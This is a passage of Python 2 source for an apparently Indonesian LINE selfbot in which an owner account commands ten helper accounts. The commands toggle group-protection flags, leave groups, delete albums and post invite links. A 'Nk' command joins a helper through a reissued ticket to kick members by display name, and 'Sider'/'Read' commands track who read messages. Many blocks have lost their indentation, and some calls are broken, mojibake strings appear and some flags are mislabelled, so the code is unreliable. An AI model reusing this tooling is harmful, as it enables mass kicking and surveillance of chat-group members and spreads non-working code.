                ki.sendText(msg.to,"All Protect off🔓✍")
                ki2.sendText(msg.to,"All Protect off🔓✍")
                ki3.sendText(msg.to,"All Protect off🔓✍")
                ki4.sendText(msg.to,"All Protect off🔓✍")
                ki5.sendText(msg.to,"All Protect off🔓✍")
                ki6.sendText(msg.to,"All Protect off🔓✍")
                ki7.sendText(msg.to,"All Protect off🔓✍")
                ki8.sendText(msg.to,"All Protect off🔓✍")
                ki9.sendText(msg.to,"All Protect off🔓✍")
                ki10.sendText(msg.to,"All Protect off🔓✍")
            else:
                # Non-JP path sends an empty message (kept from original).
                ki.sendText(msg.to,"")
        else:
            wait["inviteprotect"] = False
            if wait["lang"] == "JP":
                ki.sendText(msg.to,"Invite Protect set Off✍")
        if wait["cancelprotect"] == False:
            if wait["lang"] == "JP":
                ki2.sendText(msg.to,"Cancel Protect set Off✍")
            else:
                ki2.sendText(msg.to,"Cancel Protect set Off✍")
        else:
            wait["cancelprotect"] = False
            if wait["lang"] == "JP":
                ki2.sendText(msg.to,"Cancel Protect set Off✍")
        if wait["protect"] == False:
            if wait["lang"] == "JP":
                ki3.sendText(msg.to,"Protect set Off✍")
            else:
                ki3.sendText(msg.to,"Protect set Off✍")
        else:
            wait["protect"] = False
            if wait["lang"] == "JP":
                ki3.sendText(msg.to,"Protect set Off✍")
            else:
                ki3.sendText(msg.to,"Protect set Off✍")
        if wait["linkprotect"] == False:
            if wait["lang"] == "JP":
                ki4.sendText(msg.to,"Link Protect set Off✍")
            else:
                ki4.sendText(msg.to,"Link Protect set Off✍")
        else:
            wait["linkprotect"] = False
            if wait["lang"] == "JP":
                ki4.sendText(msg.to,"Link Protect set Off✍")
            else:
                ki4.sendText(msg.to,"Link Protect set Off✍")
        if wait["joinkick"] == False:
            if wait["lang"] == "JP":
                ki5.sendText(msg.to,"Kicker Protect set Off✍")
            else:
                ki5.sendText(msg.to,"Kicker Protect set Off✍")
        else:
            wait["joinkick"] = False
            if wait["lang"] == "JP":
                ki5.sendText(msg.to,"Kicker Protect set Off✍")
            else:
                ki5.sendText(msg.to,"Kicker Protect set Off✍")
        if wait["AutoKick"] == False:
            if wait["lang"] == "JP":
                ki5.sendText(msg.to,"Auto Kick set Off✍")
            else:
                ki5.sendText(msg.to,"Auto Kick set Off✍")
        else:
            wait["AutoKick"] = False
            if wait["lang"] == "JP":
                ki5.sendText(msg.to,"Auto Kick set Off✍")
            else:
                ki5.sendText(msg.to,"Auto Kick set Off✍")
elif msg.text.lower() == 'auto join off':
    # Disable auto-join of group invitations.
    if wait["autoJoin"] == False:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Auto Join set Off✍")
        else:
            ki.sendText(msg.to,"Auto Join set Off")
    else:
        wait["autoJoin"] = False
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Auto Join set Off✍")
        else:
            ki.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text.lower() == 'kicker off':
    # NOTE(review): dead code -- an identical 'kicker off' condition appears
    # earlier in this elif chain, so this branch is unreachable.
    if wait["joinkick"] == False:
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"Kicker Auto set Off✍")
        else:
            ki2.sendText(msg.to,"Kicker Auto set Off✍")
    else:
        wait["joinkick"] = False
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Kicker Auto set Off✍")
        else:
            ki.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Protect off"]:
    # Turn the protect flag off; in JP mode every assist bot announces it
    # (in both the already-off and freshly-disabled paths).
    if wait["protect"] == False:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Auto Protect off🔓✍")
            ki2.sendText(msg.to,"Auto Protect off🔓✍")
            ki3.sendText(msg.to,"Auto Protect off🔓✍")
            ki4.sendText(msg.to,"Auto Protect off🔓✍")
            ki5.sendText(msg.to,"Auto Protect off🔓✍")
            ki6.sendText(msg.to,"Auto Protect off🔓✍")
            ki7.sendText(msg.to,"Auto Protect off🔓✍")
            ki8.sendText(msg.to,"Auto Protect off🔓✍")
            ki9.sendText(msg.to,"Auto Protect off🔓✍")
            ki10.sendText(msg.to,"Auto Protect off🔓✍")
        else:
            ki.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
    else:
        wait["protect"] = False
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Auto Protect off🔓✍")
            ki2.sendText(msg.to,"Auto Protect off🔓✍")
            ki3.sendText(msg.to,"Auto Protect off🔓✍")
            ki4.sendText(msg.to,"Auto Protect off🔓✍")
            ki5.sendText(msg.to,"Auto Protect off🔓✍")
            ki6.sendText(msg.to,"Auto Protect off🔓✍")
            ki7.sendText(msg.to,"Auto Protect off🔓✍")
            ki8.sendText(msg.to,"Auto Protect off🔓✍")
            ki9.sendText(msg.to,"Auto Protect off🔓✍")
            ki10.sendText(msg.to,"Auto Protect off🔓✍")
        else:
            ki.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Qrprotect off","qrprotect off"]:
    # Disable QR/link protection.
    if wait["linkprotect"] == False:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Qr protect off✍")
        else:
            ki.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
    else:
        wait["linkprotect"] = False
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Qr protect off✍")
        else:
            ki.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Invitepro off"]:
    # Disable invite protection.
    if wait["inviteprotect"] == False:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Invite Protect Off🛡")
        else:
            ki.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
    else:
        wait["inviteprotect"] = False
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Invite Protect Off🛡")
        else:
            ki.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Cancelprotect off"]:
    # Disable invite-cancel protection.
    if wait["cancelprotect"] == False:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Cancel Protect Off📌")
        else:
            ki.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
    else:
        wait["cancelprotect"] = False
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Cancel Protect off✍")
        else:
            ki.sendText(msg.to,"It is already open ô€œ👈")
elif "Group cancel:" in msg.text:
    # "Group cancel:<n>" -- enable auto-decline of group invites; "off"
    # disables it.
    try:
        strnum = msg.text.replace("Group cancel:","")
        if strnum == "off":
            wait["autoCancel"]["on"] = False
            if wait["lang"] == "JP":
                ki.sendText(msg.to,"ItuItu Off")
            else:
                ki.sendText(msg.to,"Off undangan ditolak👈Sebutkan jumlah terbuka ketika Anda ingin mengirim")
        else:
            # int() doubles as validation: a non-numeric value raises and
            # falls through to the except below; `num` itself is unused.
            num = int(strnum)
            wait["autoCancel"]["on"] = True
            if wait["lang"] == "JP":
                cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis👈")
            else:
                cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
    except:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Nilai tidak benar👈")
        else:
            cl.sendText(msg.to,"Weird value🛡")
elif msg.text in ["Auto leave on","Auto leave: on"]:
    # Enable auto-leave of rooms.
    if wait["leaveRoom"] == True:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Auto Leave on🛡")
        else:
            ki.sendText(msg.to,"Sudah terbuka ")
    else:
        wait["leaveRoom"] = True
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Auto Leave On ✍")
        else:
            ki.sendText(msg.to,"Is already open👈")
elif msg.text in ["Auto leave off","Auto leave: off"]:
    # Disable auto-leave of rooms.
    if wait["leaveRoom"] == False:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Auto Leave off🛡")
        else:
            cl.sendText(msg.to,"Sudah off👈")
    else:
        wait["leaveRoom"] = False
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Auto Leave Off ✍")
        else:
            cl.sendText(msg.to,"Is already close👈")
elif msg.text in ["Joincancel on","Joincancel:on"]:
if wait["AutoJoinCancel"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Join Cancel set on✍")
else:
ki.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Join Cancel set On✍")
else:
ki.sendText(msg.to,"Is already open👈")
elif msg.text in ["Joincancel off","Joincancel:off"]:
    # Disable auto-cancel of group joins.
    if wait["AutoJoinCancel"] == False:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Auto Join Cancel set Off✍")
        else:
            cl.sendText(msg.to,"Sudah off👈")
    else:
        wait["AutoJoinCancel"] = False
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Auto Join Cancel set Off ✍")
        else:
            cl.sendText(msg.to,"Is already close👈")
elif msg.text in ["Share on","share on"]:
    # Enable timeline sharing.
    if wait["timeline"] == True:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Share on ✍ ")
        else:
            cl.sendText(msg.to,"Hal ini sudah terbuka👈")
    else:
        wait["timeline"] = True
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Ready On👈")
        else:
            cl.sendText(msg.to,"Ready On👈")
elif msg.text in ["Share off","share off"]:
    # Disable timeline sharing.
    if wait["timeline"] == False:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Share off ✍ ")
        else:
            cl.sendText(msg.to,"Hal ini sudah terbuka👈")
    else:
        wait["timeline"] = False
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Ready Off👈")
        else:
            cl.sendText(msg.to,"Ready Off👈")
elif msg.text in ["Set"]:
md = ""
if wait["Sambutan"] == True: md+="╠🔐Sambutan : 📱On\n"
else:md+="╠🔐Sambutan : 📴Off\n"
if wait["likeOn"] == True: md+="╠🔐Auto Like : 📱On\n"
else:md+="╠🔐Auto Like : 📴Off\n"
if wait["timeline"] == True: md+="╠🔐Share : 📱On\n"
else:md+="╠🔐Share : 📴Off\n"
if wait["autoAdd"] == True: md+="╠🔐Auto Add : 📱On\n"
else:md+="╠🔐Auto Add : 📴Off\n"
if wait["autoJoin"] == True: md+="╠🔐Auto Join : 📱On\n"
else: md +="╠🔐Auto Join : 📴Off\n"
if wait["leaveRoom"] == True: md+="╠🔐Auto Leave : 📱On\n"
else:md+="╠🔐Auto Leave : 📴Off\n"
if wait["AutoJoinCancel"] == True: md+="╠🔐Auto Join Cancel : 📱On\n"
else: md +="╠🔐Auto Join Cancel : 📴Off\n"
if wait["contact"] == True: md+="╠🔐Info Contact : 📱On\n"
else: md+="╠🔐Info Contact : 📴Off\n"
if wait["cancelprotect"] == True:md+="╠🔐Auto Cancel : 📱On\n"
else: md+= "╠🔐Auto Cancel : 📴Off\n"
if wait["inviteprotect"] == True:md+="╠🔐Invite Protect : 📱On\n"
else: md+= "╠🔐Invite Protect : 📴Off\n"
if wait["protect"] == True: md+="╠🔐Protect Mode : 📱On\n"
else:md+="╠🔐Protect Mode : 📴Off\n"
if wait["linkprotect"] == True: md+="╠🔐Link Protect : 📱On\n"
else:md+="╠🔐Link Protect : 📴Off\n"
if wait["AutoKick"] == True: md+="╠🔐Auto Kick : 📱On\n"
else:md+="╠🔐Auto Kick : 📴Off\n"
if wait["joinkick"] == True: md+="╠🔐Kick Joiners : 📱On\n"
else:md+="╠🔐Kick Joiners : 📴Off\n"
if wait["alwaysRead"] == True: md+="╠🔐Always Read : 📱On\n"
else:md+="╠🔐Always Read: 📴Off\n"
if wait["detectMention"] == True: md+="╠🔐Auto Respon1 : 📱On\n"
else:md+="╠🔐Auto Respon1 : 📴Off\n"
if wait["detectMention2"] == True: md+="╠🔐Auto Respon2 : 📱On\n"
else:md+="╠🔐Auto Respon2 : 📴Off\n"
if wait["detectMention3"] == True: md+="╠🔐Auto Respon3 : 📱On\n"
else:md+="╠🔐Auto Respon3 : 📴Off\n"
if wait["detectMention4"] == True: md+="╠🔐Auto Respon4 : 📱On\n"
else:md+="╠🔐Auto Respon4 : 📴Off\n"
if wait["kickMention"] == True: md+="╠🔐Auto Respon Kick : 📱On\n"
else:md+="╠🔐Auto Respon Kick : 📴Off\n"
if wait["commentOn"] == True: md+="╠🔐Auto Comment : 📱On\n"
else:md+="╠🔐Auto Comment Kick : 📴Off\n"
if wait["sticker"] == True: md+="╠🔐Detect Sticker : 📱On\n"
else:md+="╠🔐Detect Sticker : 📴Off\n"
if wait["Sider"] == True: md+="╠🔐Detect Sider : 📱On\n"
else:md+="╠🔐Detect Sider : 📴Off\n"
if wait["Mimic"] == True: md+="╠🔐Mimic Mode : 📱On\n"
else:md+="╠🔐Mimic Mode : 📴Off\n"
if wait["Simi"] == True: md+="╠🔐Simisimi : 📱On\n"
else:md+="╠🔐Simisimi: 📴Off\n"
cl.sendText(msg.to,"╔════════════════════\n""║ ☆☞ Re̶y̶Pr̶o̶ Setting ☜☆\n""╠════════════════════\n"+md+"╚════════════════════")
eltime = time.time() - mulai
van = "Runtime :" +waktu(eltime)+"\nVersi Bot :2.6.4-ŠĒ『Python 2.7』"
cl.sendText(msg.to,van)
elif msg.text.lower() == 'me':
    # Send the owner's own contact card from every account.
    msg.contentType = 13
    msg.contentMetadata = {'mid': mid}
    cl.sendMessage(msg)
    ki.sendMessage(msg)
    ki2.sendMessage(msg)
    ki3.sendMessage(msg)
    ki4.sendMessage(msg)
    ki5.sendMessage(msg)
    ki6.sendMessage(msg)
    ki7.sendMessage(msg)
    ki8.sendMessage(msg)
    ki9.sendMessage(msg)
    ki10.sendMessage(msg)
elif cms(msg.text,["creator","Creator"]):
    # Send the creator's (admsa) contact card with a short plea.
    msg.contentType = 13
    msg.contentMetadata = {'mid': admsa}
    ki.sendText(msg.to," My Creator ")
    ki2.sendMessage(msg)
    ki2.sendText(msg.to," Dont Kick out From group ")
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"All invitations have been refused")
else:
ki.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif "Set album:" in msg.text:
gid = msg.text.replace("Set album:","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada album👈")
else:
cl.sendText(msg.to,"Dalam album tidak👈")
else:
if wait["lang"] == "JP":
mg = "Berikut ini adalah album dari target"
else:
mg = "Berikut ini adalah subjek dari album"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "æžš\n"
else:
mg += str(y["title"]) + ":0 Pieces\n"
cl.sendText(msg.to,mg)
elif "Album" in msg.text:
gid = msg.text.replace("Album","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada album")
else:
cl.sendText(msg.to,"Dalam album tidak")
else:
if wait["lang"] == "JP":
mg = "Berikut ini adalah album dari target"
else:
mg = "Berikut ini adalah subjek dari album"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "\n"
else:
mg += str(y["title"]) + ":0 pieces\n"
# --- "Hapus album <id>": delete every album under the given id ---
elif "Hapus album " in msg.text:
    gid = msg.text.replace("Hapus album ","")
    albums = cl.getAlbum(gid)["result"]["items"]
    i = 0
    if albums != []:
        for album in albums:
            # NOTE(review): keyed by album["gid"] here but album["id"] in
            # the "Album deleted:" branch below -- one of the two key names
            # is likely wrong; confirm against the API's album payload.
            cl.deleteAlbum(gid,album["gid"])
            i += 1
    if wait["lang"] == "JP":
        cl.sendText(msg.to,str(i) + "Soal album telah dihapus")
    else:
        cl.sendText(msg.to,str(i) + "Hapus kesulitan album🛡")
# --- "group id": list every group ki has joined with its id ---
elif msg.text.lower() == 'group id':
    gid = ki.getGroupIdsJoined()
    h = ""
    for i in gid:
        h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
    ki.sendText(msg.to,h)
# --- "Blank": send a contact card with a bogus mid (renders blank) ---
elif 'Blank' in msg.text:
    msg.contentType = 13
    msg.contentMetadata = {'mid': "Reiyan,'"}
    ki3.sendMessage(msg)
elif msg.text in ["Out"]:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
ki6.leaveGroup(i)
ki7.leaveGroup(i)
ki8.leaveGroup(i)
ki9.leaveGroup(i)
ki10.leaveGroup(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Bot Sudah Keluar Di semua grup")
else:
ki.sendText(msg.to,"Declined all invitations")
# --- "Album deleted:<id>": delete every album under the given id ---
elif "Album deleted:" in msg.text:
    gid = msg.text.replace("Album deleted:","")
    albums = cl.getAlbum(gid)["result"]["items"]
    i = 0
    if albums != []:
        for album in albums:
            cl.deleteAlbum(gid,album["id"])
            i += 1
    if wait["lang"] == "JP":
        cl.sendText(msg.to,str(i) + "Soal album telah dihapus👈")
    else:
        cl.sendText(msg.to,str(i) + "Hapus kesulitan album👈")
# --- toggle automatic friend-add acceptance ---
elif msg.text in ["Auto add on","Add auto on"]:
    if wait["autoAdd"] == True:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Already On")
        else:
            cl.sendText(msg.to,"Already On👈")
    else:
        wait["autoAdd"] = True
        # NOTE(review): still says "Already On" right after enabling --
        # misleading copy, left as-is since it is runtime output.
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Already On👈")
        else:
            cl.sendText(msg.to,"Already On👈")
elif msg.text in ["Auto add off","Add auto off"]:
    if wait["autoAdd"] == False:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Hal ini sudah off👈")
        else:
            cl.sendText(msg.to,"Hal ini sudah dimatikan👈")
    else:
        wait["autoAdd"] = False
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Already Off👈")
        else:
            cl.sendText(msg.to,"Untuk mengaktifkan-off👈")
# --- set the auto-add greeting text / help text ---
elif "Message set:" in msg.text:
    wait["message"] = msg.text.replace("Message set:","")
    ki.sendText(msg.to,"We changed the message👈")
elif "Help set:" in msg.text:
    wait["help"] = msg.text.replace("Help set:","")
    ki2.sendText(msg.to,"We changed the Help👈")
elif "Pesan add-" in msg.text:
    wait["message"] = msg.text.replace("Pesan add-","")
    if wait["lang"] == "JP":
        cl.sendText(msg.to,"Kami mengubah pesan🛡")
    else:
        cl.sendText(msg.to,"Change information")
# --- show the current auto-add greeting text ---
elif msg.text in ["Pesan add cek","Message Confirmation"]:
    if wait["lang"] == "JP":
        cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
    else:
        cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
# --- "Change": flip the reply-language flag between "JP" and "TW" ---
elif msg.text in ["Change","change"]:
    if wait["lang"] =="JP":
        wait["lang"] = "TW"
        cl.sendText(msg.to,"I changed the language to engglis👈")
    else:
        wait["lang"] = "JP"
        cl.sendText(msg.to,"I changed the language to indonesia👈")
# --- "Message set<text>" (colon-less form; the ":" variant is caught by
# the branch above): set the auto-comment text ---
elif "Message set" in msg.text:
    c = msg.text.replace("Message set","")
    if c in [""," ","\n",None]:
        cl.sendText(msg.to,"Is a string that can not be changed👈")
    else:
        wait["comment"] = c
        cl.sendText(msg.to,"This has been changed👈\n\n" + c)
elif "Come Set:" in msg.text:
    c = msg.text.replace("Come Set:","")
    if c in [""," ","\n",None]:
        ki.sendText(msg.to,"Merupakan string yang tidak bisa diubah👈")
    else:
        wait["comment"] = c
        cl.sendText(msg.to,"Ini telah diubah👈\n\n" + c)
# --- toggle auto-comment on friends' posts ---
elif msg.text in ["Com on","Com:on","Comment on"]:
    if wait["commentOn"] == True:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Aku berada di👈")
        else:
            cl.sendText(msg.to,"To open👈")
    else:
        wait["commentOn"] = True
        if wait["lang"] == "JP":
            # NOTE(review): mojibake -- runtime strings left byte-for-byte.
            cl.sendText(msg.to,"オンã«ã—ã¾ã—ãŸ👈")
        else:
            cl.sendText(msg.to,"è¦äº†å¼€👈")
elif msg.text in ["Come off"]:
    if wait["commentOn"] == False:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Come off")
        else:
            ki.sendText(msg.to,"It is already turned off")
    else:
        wait["commentOn"] = False
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Off👈")
        else:
            ki.sendText(msg.to,"To turn off")
# --- "Com"/"Comment": show the current auto-comment text ---
elif msg.text in ["Com","Comment"]:
    cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:👈\n\n" + str(wait["comment"]))
# --- "url": enable join-by-link for this group and post the ticket URL ---
elif msg.text in ["url","Url"]:
    if msg.toType == 2:                       # 2 = group chat
        g = cl.getGroup(msg.to)
        if g.preventJoinByTicket == True:
            g.preventJoinByTicket = False
            cl.updateGroup(g)
        gurl = cl.reissueGroupTicket(msg.to)
        ki.sendText(msg.to,"line://ti/g/" + gurl)
    else:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
        else:
            cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
# --- "Gurl": same as "url" but acting through the ki account ---
elif msg.text in ["Gurl"]:
    if msg.toType == 2:
        x = cl.getGroup(msg.to)
        if x.preventJoinByTicket == True:
            x.preventJoinByTicket = False
            ki.updateGroup(x)
        gurl = ki.reissueGroupTicket(msg.to)
        ki.sendText(msg.to,"line://ti/g/" + gurl)
    else:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Can't be used outside the group")
        else:
            ki.sendText(msg.to,"Not for use less than group")
# --- "Rey gurl"/"Rey curl": open/close join-by-link for this group ---
elif "Rey gurl" in msg.text:
    if msg.toType == 2:
        group = ki.getGroup(msg.to)
        group.preventJoinByTicket = False
        ki.updateGroup(group)
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"URL on ✍")
    else:
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"It can not be used outside the group 👈")
        else:
            ki2.sendText(msg.to,"Can not be used for groups other than ô€œ")
elif "Rey curl" in msg.text:
    if msg.toType == 2:
        group = ki.getGroup(msg.to)
        group.preventJoinByTicket = True
        ki.updateGroup(group)
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"URL Closed ✍")
    else:
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"It can not be used outside the group 👈")
        else:
            ki2.sendText(msg.to,"Can not be used for groups other than ô€œ")
# --- comment-blacklist management: the flags arm a later contact-message
# handler (elsewhere in this file) that consumes the next sent contact ---
elif msg.text in ["Com Bl"]:
    wait["wblack"] = True
    cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklistô€œô€…”👈")
elif msg.text in ["Com hapus Bl"]:
    wait["dblack"] = True
    cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklistô€œô€…”👈")
elif msg.text in ["Com Bl cek"]:
    if wait["commentBlack"] == {}:
        cl.sendText(msg.to,"Nothing in the blacklistô€œ🛡")
    else:
        cl.sendText(msg.to,"The following is a blacklistô€œ👈")
        mc = ""
        for mi_d in wait["commentBlack"]:
            mc += "・" +cl.getContact(mi_d).displayName + "\n"
        cl.sendText(msg.to,mc)
# --- clock-in-name feature: show the current time in the display name ---
elif msg.text.lower() == 'jam on':
    if wait["clock"] == True:
        cl.sendText(msg.to,"Sudah On")
    else:
        wait["clock"] = True
        now2 = datetime.now()
        nowT = datetime.strftime(now2,"(%H:%M)")
        profile = cl.getProfile()
        profile.displayName = wait["cName"] + nowT   # base name + "(HH:MM)"
        cl.updateProfile(profile)
        cl.sendText(msg.to,"👉Jam on👈")
elif msg.text.lower() == 'jam off':
    if wait["clock"] == False:
        cl.sendText(msg.to,"Hal ini sudah off🛡")
    else:
        wait["clock"] = False
        cl.sendText(msg.to,"Adalah Off")
# --- "Jam say:<name>": set the base display name used by the clock ---
elif "Jam say:" in msg.text:
    n = msg.text.replace("Jam say:","")
    # Length check in characters, not bytes (Python 2 str -> unicode).
    if len(n.decode("utf-8")) > 30:
        cl.sendText(msg.to,"terlalu lama")
    else:
        wait["cName"] = n
        cl.sendText(msg.to,"Ini telah diubah🛡\n\n" + n)
# --- "update": refresh the clock suffix in the display name now ---
elif msg.text.lower() == 'update':
    if wait["clock"] == True:
        now2 = datetime.now()
        nowT = datetime.strftime(now2,"(%H:%M)")
        profile = cl.getProfile()
        profile.displayName = wait["cName"] + nowT
        cl.updateProfile(profile)
        cl.sendText(msg.to,"Diperbarui👈")
    else:
        cl.sendText(msg.to,"Silahkan Aktifkan Nama")
elif "Nk " in msg.text:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki3.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki3.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
# --- "Sider": (re)start read-receipt tracking in this chat ---
elif msg.text == "Sider":
    cl.sendText(msg.to, "hmm..")
    try:
        # Drop any previous tracking state for this chat.
        del wait2['readPoint'][msg.to]
        del wait2['readMember'][msg.to]
    except:
        pass
    now2 = datetime.now()
    wait2['readPoint'][msg.to] = msg.id    # message id to track reads from
    wait2['readMember'][msg.to] = ""       # accumulates readers' names
    wait2['ROM'][msg.to] = {}              # per-reader entries
    wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
    print wait2
elif msg.text == "Read":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "== Bakekok Sider == %s\nthat's it\n\nPeople who have ignored reads\n%skampret lo sider. ♪\n\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "An already read point has not been set.\n「set」you can send ♪ read point will be created ♪")
#-----------------------[Add Staff Section]------------------------
elif "Add staff @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Add Staff @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff add executing"
_name = msg.text.replace("Add Staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove Staff @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove Staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
